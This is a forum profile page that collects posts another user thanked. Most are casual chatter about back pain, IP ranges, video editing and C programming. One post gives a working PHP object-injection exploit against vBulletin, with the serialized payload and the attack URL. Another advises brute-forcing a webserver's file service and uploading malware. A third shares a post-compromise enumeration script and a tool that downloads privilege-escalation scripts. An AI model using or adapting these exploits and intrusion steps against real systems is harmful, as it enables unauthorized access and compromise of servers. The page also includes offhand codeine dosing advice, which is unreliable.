User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 32
  6. 33
  7. 34
  8. 35
  9. 36
  10. 37

Posts That Were Thanked by SBTlauien

  1. -SpectraL coward [the spuriously bluish-lilac bushman]


    php << 'eof'
    <?php
    class vB_Database {
    public $functions = array();

    public function __construct()
    {
    $this->functions['free_result'] = 'phpinfo';
    }
    }

    class vB_dB_Result {
    protected $db;
    protected $recordset;

    public function __construct()
    {
    $this->db = new vB_Database();
    $this->recordset = 1;
    }
    }

    print urlencode(serialize(new vB_dB_Result())) . "\n";
    eof
    O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

    http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D


    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Sophie Pedophile Tech Support
    Attack the services running on the webserver. Like FTP, POP3, the mailserver. Sometimes the MySQL DB listens on port 3306. You could bruteforce the file server and upload malware. Or see if there is a flaw in the service you are targeting itself that can be exploited with a buffer overflow or what have you. This is why it is important to enumerate the type of service you are dealing with and the version. One such technique involves banner grabbing with the FTP service to get the version and such. Once you know the version you can look for vulnerabilities on exploit-db and similar sites. Or download the exact same thing run it locally and bang on it/reverse engineer until you find something.

    Nexpose and Metasploit are really good at server side security testing.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Sophie Pedophile Tech Support

    #!/bin/bash

    function main()
    { printf "\nThis script enumerates system information and appends it to a textfile.\n"
    printf "\nThese items will be enumerated:

    1. User IDs and login history.
    2. OS details and mounted disks.
    3. Network status and information.
    4. Running processes.\n\n"

    read -p 'Continue? Y/n : ' choice2
    if [[ $choice2 == 'y' ]]; then
    enum
    else
    echo "Aborted"
    exit 1
    fi
    }


    function enum()
    { printf "\n\nPlease provide a path to which the output will be saved. I.e /tmp/output.txt\n"
    read -p 'Path? : ' outfile

    echo "+-+-+-+-+" | tee -a $outfile 1>&2
    echo "|L|O|G|S|" | tee -a $outfile 1>&2
    echo "+-+-+-+-+" | tee -a $outfile 1>&2

    printf "\n\nUser IDs\n" | tee -a $outfile 1>&2
    whoami | tee -a $outfile 1>&2
    printf "\n\n" | tee -a $outfile 1>&2
    id | tee -a $outfile 1>&2
    printf "\n\n" | tee -a $outfile 1>&2
    last | tee -a $outfile 1>&2
    sleep 0.5 && clear

    printf "\n\nOS details and mounted disks\n\n" | tee -a $outfile 1>&2

    uname -a | tee -a $outfile 1>&2
    printf "\n\n" | tee -a $outfile 1>&2
    df -h | tee -a $outfile 1>&2
    sleep 0.5 && clear

    printf "\n\nNetwork status & info\n\n" | tee -a $outfile 1>&2

    ifconfig -a | tee -a $outfile 1>&2
    printf "\n\n" | tee -a $outfile 1>&2
    arp -a | tee -a $outfile 1>&2
    printf "\n\n" | tee -a $outfile 1>&2
    netstat -atp | tee -a $outfile 1>&2
    sleep 0.5 && clear

    printf "\n\nProcess info\n\n" | tee -a $outfile 1>&2

    ps -d -f | tee -a $outfile 1>&2
    sleep 0.5 && clear

    echo "Done, output saved to $outfile"
    exit 1
    }


    if [[ "$EUID" -ne 0 ]]; then
    echo "It is recommended that this script is run as root"
    printf "\nRunning it without super user privilege will affect the results\n"

    read -p 'Continue without root? Y/n : ' choice1
    if [[ $choice1 == 'y' ]]; then
    main
    else
    echo "Aborted"
    exit 1
    fi
    else
    main
    fi


    I am building a bash multi tool in effect. I will be combing features i have in some other bash scripts so that it will be useful, not only for sysadmin stuff but for OffSec purposes as well.

    I will be including features from RootHelper and KernMan, see below for those scripts.


    #!/bin/bash

    function usage()
    { printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
    and exploit suggestion scripts. Below is a quick overview of the available options.

    The 'Help' option displays this informational message.

    The 'Download' option fetches the relevant files and places them in the /tmp/ directory.

    The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
    note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead

    The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
    }

    # Download and unzip
    function dzip()
    { echo "Downloading and extracting scripts..."
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    `wget -O /tmp/firmwalker.zip https://github.com/craigz28/firmwalker/archive/master.zip`
    for zip in *.zip
    do
    dirname=`echo $zip | sed 's/\.zip$//'`
    if mkdir $dirname
    then
    if cd $dirname
    then
    unzip ../$zip
    cd ..
    rm -f $zip
    else
    echo "Could not unpack $zip - cd failed"
    fi
    else
    echo "Could not unpack $zip - mkdir failed"
    fi
    done
    }

    dir="/tmp/"

    usage

    printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

    PS3='Please enter your choice: '
    options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
    select opt in "${options[@]}"
    do
    case $opt in
    "Help")
    usage
    printf "%b \n"
    ;;
    "Download")
    echo "Downloading scripts to /tmp/"
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    `wget -O /tmp/firmwalker.zip https://github.com/craigz28/firmwalker/archive/master.zip`
    printf "%b \n"
    ;;
    "Download and unzip")
    dzip
    printf "%b \n"
    ;;
    "Clean up")
    echo "Removing downloaded files"
    find $dir/* -exec rm {} \;
    printf "%b \n"
    ;;
    "Quit")
    break
    ;;
    *) echo invalid option;;
    esac
    done



    #!/bin/bash

    if [[ "$EUID" -ne 0 ]]; then
    echo "This script must be run as root" 1>&2
    exit 1
    fi

    function logo()
    { echo " _____ _____ "
    echo "| | |___ ___ ___| |___ ___ "
    echo "| -| -_| _| | | | | .'| |"
    echo "|__|__|___|_| |_|_|_|_|_|__,|_|_|"
    printf "\nKernMan - Kernel Management Assistant.\n"
    }

    logo

    function usage()
    { printf "\nKernMan is a script written for the purpuse of simplyfying Kernel Managenemt.

    Select the option 'List' to display all installed kernels. Select the option 'Purge' to display
    all kernels that can be removed and subsequently do so\n\n"
    }



    PS3='Please enter your choice: '
    options=("Usage" "List" "Purge" "Quit")
    select opt in "${options[@]}"
    do
    case $opt in
    "Usage")
    usage
    ;;
    "List")
    dpkg -l linux-image-\* | grep ^ii
    ;;
    "Purge")
    kernelver=$(uname -r | sed -r 's/-[a-z]+//')
    dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve $kernelver

    printf "\nThese items will be deleted.\n"
    read -p 'Continue? Y/n ' choice

    if [[ $choice == "y" ]]; then
    sudo apt-get purge $(dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve "$(uname -r | sed -r 's/-[a-z]+//')")
    else
    echo "Aborted"
    break
    exit 1
    fi
    ;;
    "Quit")
    break
    ;;
    *) echo invalid option;;
    esac
    done



    The scripts are up on my github as well. https://github.com/NullArray


    Post last edited by Sophie at 2017-01-31T15:01:25.800871+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. -SpectraL coward [the spuriously bluish-lilac bushman]
    Soak in a steaming hot bath for 30 minutes, then put a heating pad on it for a couple of hours. Take two generic Tylonol with codeine in it every 3-4 hours. Call me in the morning.
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. mmQ Lisa Turtle
    Back pain is a real pain in the back. I get it sometimes but it seems random so I don't know how to address it. I just sort of deal with it I guess. I suppose things like stretching and being active can certainly help prevent such pains.

    Interestingly I began to develop some back pains from my old mattress, and have been sleeping on my couch for the last 6 months and they've gone away. I even have a brand new mattress and box spring but have grown so accustomed to my couch that I just keep sleeping there. Now my empty bed only gets used for unmentionables.
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. its so funny that you must spend hours every day listening to these things
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. Lanny Bird of Courage
    I've seen people posting about this bullshit for a while but this is the first time I looked it up. So gang stalking just means schizophrenia? Kinda disappointing, I was hoping for some kind urban actual gang activity like the knockout game or something.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. But she's drinking diet pepsi guys!
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. Merlin Houston
    Re-reading your post, are you suggesting that Sprint is doing MITM proxy to those addresses? I don't think so, that would break HTTPS. Also If the address was unreachable and you were hitting a last hop somewhere in ISP land I think there would be some indication, you wouldn't be able to 'GET' anything. I suppose you could ping it to be certain and see what it responds with.

    It's CalDSL, not Sprint (unless they are somehow affiliated). And those addresses are going to be an assortment of their customers.

    192.0.10.213 for example is a "PowerBeam 5AC 400" which is Ubiquity brand and looks like a commercial router. Residential routers should have saner defaults that don't open themselves to the Internet, but you never know. Ubiquity and Windows server would suggest to me it's commercial space, probably what they have allocated for customer that bought a static IP.
    The following users say it would be alright if the author of this post didn't die in a fire!
  10. Lanny Bird of Courage
    My guess is it's an embedded http server used by some popular ISP on their modems, which explains a relative homogeneity of them (there are fewer embedded HTTP servers in the world than normal HTTP servers). So what you're hitting are probably residential modems or routers, as the screenshots suggests. Why is it called "WebProxy"? Well in some sense all CGI servers are proxies in that they don't hold application logic, they just shuttle it from a socket to a script, and then from the script back to the socket so it could be that. Or someone could have just picked a name out of a hat.

    It's worth mentioning the Server header can lie, it's not unheard of to obfuscate or omit it, there's nothing that actually hinges on it so you can put whatever in there.
    The following users say it would be alright if the author of this post didn't die in a fire!
  11. Merlin Houston
    As for what it's used for whois is always handy:


    $ whois 192.0.10.1
    ...
    NetRange: 192.0.8.0 - 192.0.15.255
    CIDR: 192.0.8.0/21
    NetName: ZINNIA
    NetHandle: NET-192-0-8-0-1
    Parent: NET192 (NET-192-0-0-0-0)
    NetType: Direct Allocation
    OriginAS: AS4323, AS6939
    Organization: CalDSL (ZINNI-1)
    RegDate: 2012-11-05
    Updated: 2015-04-05
    Comment: Zinnia Networks Inc dba CalDSL
    Ref: https://whois.arin.net/rest/net/NET-192-0-8-0-1


    OrgName: CalDSL
    OrgId: ZINNI-1
    Address: 1660 W Linne Road, Suite H
    City: Tracy
    StateProv: CA
    PostalCode: 95377
    Country: US
    RegDate: 2004-08-02
    Updated: 2012-11-30
    Ref: https://whois.arin.net/rest/org/ZINNI-1
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. Merlin Houston
    192.0.0.0/16 (192.0.*.*) is public internet space, so it could be anyone, likely not Sprint. 192.168.0.0/16 is the private space (among others).

    Though sometimes ISPs will use private space the way you are thinking. Your uplink will route you to it as it just pushes the request through the default route and it just so happens there's a machine with that address between you and the Internet. Even though it's their LAN you are able to route to it, of course you could also use the same LAN space, just the default route wouldn't be hit and traffic wouldn't get routed out to the ISP side.

    I wouldn't expect that on the 192.168.0.0/16 space though, it would be on 10.0.0.0/8 or 172.whatever.

    Post last edited by Merlin at 2017-01-19T02:56:46.683799+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
  13. mmQ Lisa Turtle
    The following users say it would be alright if the author of this post didn't die in a fire!
  14. Parker Brother Yung Blood [the valiantly arthrosporous wyatt]
    I use Kdenlive for video editing in Linux. You might also give Blender a try. I've never used its video editing capabilities, but I've heard good things.
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. ^What a fucking surprise. Cops treat people who hate cops and riot like shit. What a motherfucking surprise.
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. AngryOnion Big Wig [the nightly self-effacing broadsheet]
    Anything more complicated than this makes my head hurt.
    10 CLS
    20 PRINT "Hello, world!"
    30 PRINT "I'm learning about commands in BASIC."
    40 PRINT "This text is being printed via the PRINT command."
    50 PRINT "On the next line, I'll use CLS."
    60 CLS "Now the next word would be PRINT."
    70 PRINT "Finally, on line 80, I'll use END."
    80 END "And return to PRINT"
    90 PRINT "Now my program is over."
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. Originally posted by SBTlauien Well, we can't legally hack back in retaliation.

    I dont believe this is true. People say the second amendment is the right to bear firearms, but in reality (and many who do not live in reality disagree with me here) it pertains to the right to bear arms in an extremely general sense. Basically its meaning should be taken constitutionally as a leveling of the playing field. So in any warfare the playing field should be equal between citizens and oppressors. I take this to mean that cyber-arms are protected under this amendment. Perhaps the Federal Courts wont agree, but those courts themselves are the exact thing this amendment was created to protect us against. So fuck it man, if the FBI is oppressing you, you have a constitutional duty to fight back with whatever arms you have.

    Why did a black van just pull into my driveway?
    The following users say it would be alright if the author of this post didn't die in a fire!
  18. -SpectraL coward [the spuriously bluish-lilac bushman]
    That's not the way it works. You can be illegally hacked, but you're not permitted to hack back in retaliation. Fair is fair.
    The following users say it would be alright if the author of this post didn't die in a fire!
  19. aldra JIDF Controlled Opposition
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. Lanny Bird of Courage
    ^that, argv is conceptually an array of strings, the arguments passed when the program was invoked. Strings are type *char (pointer to an (array of) char) so an array of them is referenced by type char**. If you want the first arg passed to your program you use argv[1], which is a string. As for getting it into something you can pass to setsockopt() you can't just pass the arg since, as mentioned, it's a string. `AF_INET` is just an integer that has some meaning to the socket library. You need to parse your arg list and figure out what each arg means yourself (you can't do it dynamically because the relationship between the string "AF_INET" and the constant is lost in compilation). Something like (not tested):


    int main(int argc, char ** argv) {
    // Default to AF_INET
    int AF = AF_INET;
    char *IPv6_FLAG = "--AF_INET6";

    for (int i=0; i<argc; i++) {
    if (!strcmp(argv[i], IPv6_FLAG)) {
    AF = AF_INET6;
    }
    }

    socket_fd = socket(AF, SOCK_STREAM, 0);
    }


    Post last edited by Lanny at 2017-01-05T08:51:10.120481+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
  1. 1
  2. 2
  3. 3
  4. ...
  5. 32
  6. 33
  7. 34
  8. 35
  9. 36
  10. 37
Jump to Top